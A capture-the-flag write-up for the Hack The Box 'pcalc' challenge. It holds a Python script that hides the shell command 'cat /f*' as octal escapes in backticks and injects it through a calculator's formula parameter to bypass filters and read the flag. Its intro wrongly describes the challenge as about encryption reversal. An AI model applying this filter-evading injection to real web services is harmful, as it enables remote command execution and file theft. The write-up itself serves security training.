HackTheBox pcalc Writeup
Explore the basics of cybersecurity in the pcalc Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/542
Description
A calculator service has been deployed at an enemy’s agency, for their personel to be acquainted with human numbers. We need to inflitrate the application and get access to the secret flag stored inside it’s system!
Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/env python3
import requests,re,sys
def generate_payload():
command = "cat /f*"
octal_bytes = ['\\' + format(ord(char), 'o') for char in command]
payload = f"`{''.join(octal_bytes)}`"
return payload
def exploit(url):
payload = generate_payload()
print(f"[*] Generated payload: {payload}")
try:
r = requests.get(f"{url}/?formula={payload}")
flag = re.findall(r'HTB{[^}]+}', r.text)
if flag:
print(f"[+] Found flag: {flag[0]}")
else:
print("[-] No flag found in response")
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
url = sys.argv[1]
target = f"http://{url}"
exploit(target)
Summary
The pcalc Challenge on Hack The Box is a medium-level web security challenge focusing on command injection in a calculator application. The exploit involves transforming shell commands into octal format to bypass input filters, allowing remote command execution. Using a Python script, the attack converts the command cat /f* into octal bytes and executes it through the calculator’s formula parameter to retrieve the hidden flag. This challenge demonstrates how seemingly innocent calculator applications can be vulnerable to command injection attacks when input validation is insufficient, and showcases techniques for encoding payloads to bypass security controls.